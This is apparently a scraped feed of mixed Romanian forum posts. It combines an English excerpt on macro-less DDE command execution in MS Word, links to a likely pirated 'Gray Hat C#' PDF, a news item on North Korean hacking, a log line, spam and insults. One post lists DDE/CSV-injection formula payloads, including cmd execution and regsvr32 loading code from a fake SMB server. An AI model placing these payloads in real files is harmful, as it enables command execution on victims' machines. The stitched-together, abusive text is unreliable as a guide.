Leaderboard

What if we told you that there is a way to get command execution on MSWord without any Macros, or memory corruption?! Windows provides several methods for transferring data between applications. One method is to use the Dynamic Data Exchange (DDE) protocol. The DDE protocol is a set of messages and guidelines. It sends messages between applications that share data and uses shared memory to exchange data between applications. Applications can use the DDE protocol for one-time data transfers and for continuous exchanges in which applications send updates to one another as new data becomes available. In our context DDE works by executing an application, that will provide the data (data provider). In a previous post1 We discussed using DDE in MSExcel to gain command execution, and have had great success in using this technique to bypass macro filtering mail gateways and corporate VBA policies. DDE isn’t only limited to Excel and Word has had DDE capabilities all this time. This has been mentioned by others2 as a possible avenue, but to our knowledge, no-one has actually demonstrated this to work. https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ L-am incercat in Word 2010, si merge.

BRIEF CONTENTS Foreword by Matt Graeber Preface Chapter 1: C# Crash Course Chapter 2: Fuzzing and Exploiting XSS and SQLInjection Chapter 3: Fuzzing SOAP Endpoints Chapter 4: Writing Connect-Back, Binding, and Metasploit Payloads Chapter 5: Automating Nessus Chapter 6: Automating Nexpose Chapter 7: Automating OpenVAS Chapter 8: Automating Cuckoo Sandbox Chapter 9: Automating sqlmap Chapter 10: Automating ClamAV Chapter 11: Automating Metasploit Chapter 12: Automating Arachni Chapter 13: Decompiling and Reversing Managed Assemblies Chapter 14: Reading Offline Registry Hives https://www.google.ro/url?sa=t&source=web&rct=j&url=https://dl.kuroy.me/foreign/learnflakes/Brandon%20Perry%20-%20Gray%20Hat%20C%23/Brandon%20Perry%20-%20Gray%20Hat%20C%23_%20A%20Hacker%27s%20Guide%20to%20Creating%20and%20Automating%20Security%20Tools.pdf&ved=0ahUKEwjk_NfE74nYAhVS46QKHQNyCC4QFggjMAA&usg=AOvVaw1eTppV_6dAAZgoATyu8nOR https://smtebooks.com/Downloads/5794/gray-hat-c-pdf https://github.com/brandonprry/gray_hat_csharp_code https://books.google.ro/books?id=uAYvDwAAQBAJ&pg=PA130&lpg=PA130&dq=Gray+Hat+C%23:+Creating+and+Automating+Security+Tools+pdf&source=bl&ots=ZmCsAeFAsJ&sig=TmcTTAcgaYNH5c6nwy33VaY6fhQ&hl=ro&sa=X&ved=0ahUKEwiKnZr3w-bWAhXMKVAKHexJAA04ChDoAQgkMAE#v=onepage&q=Gray Hat C%23%3A Creating and Automating Security Tools pdf&f=false

Ca in filmele cu prosti.. Hackers from North Korea are reported to have stolen a large cache of military documents from South Korea, including a plan to assassinate North Korea's leader Kim Jong-un. Rhee Cheol-hee, a South Korean lawmaker, said the information was from his country's defence ministry. The compromised documents include wartime contingency plans drawn up by the US and South Korea. They also include reports to the allies' senior commanders. He said some 235 gigabytes of military documents had been stolen from the Defence Integrated Data Centre, and that 80% of them have yet to be identified. Articol complet

Inca un articol recent pe aceiasi tema - http://georgemauer.net/2017/10/07/csv-injection.html. Exista cateva chestii dragute care se pot face cu DDE: =cmd|'/C calc'!A0 (exemplul clasic) =IExplore|WWW_OpenURL!www.mataigrasa.com =regsvr32|\\<fakeSmbServer>\\mataigrasa!A0 De cele mai multe ori am intalnit chestia asta in aplicatii web care genereaza rapoarte in format CSV/XLS unde tu ai un oarecare control asupra datelor care intra in raport.

2017-10-10 10:42:21,086 fail2ban.actions: WARNING [ssh] Ban meteor

Da, interesant, dar metodele de exploatare (clasic si cu DDE) sunt deja cunoscute de la exploarea CSV injection (https://www.contextis.com/blog/comma-separated-vulnerabilities). Bine de stiut ca functioneaza si in Word, pacat ca si in cazul asta apar doua alerte.

Promotii de la diferite magazine online, actualizate zilnic. https://pricezone.ro/promotions

Ce exprimare ai... acum ai iesit din canal? cum plm gasiti forumul asta toti dilimacii, greu de inteles.

Good old Nigerian scam

"Numarul numarul numarul". Mi-ai adus aminte de "Si... solutia? Care este solutia? Solutia, domnilor?" Mihaitza boss. Mars :)))))))))

te mananca in cur ce plm ti am zis ,cultule care esti,in loc sa lasi o idee buna si sa facem cumva sa intram in contact,eu am cont aici de 5 ani lacheule,

vand credit toate retele(orange,vodafone,telekom)5-30$ rog seriozitate ...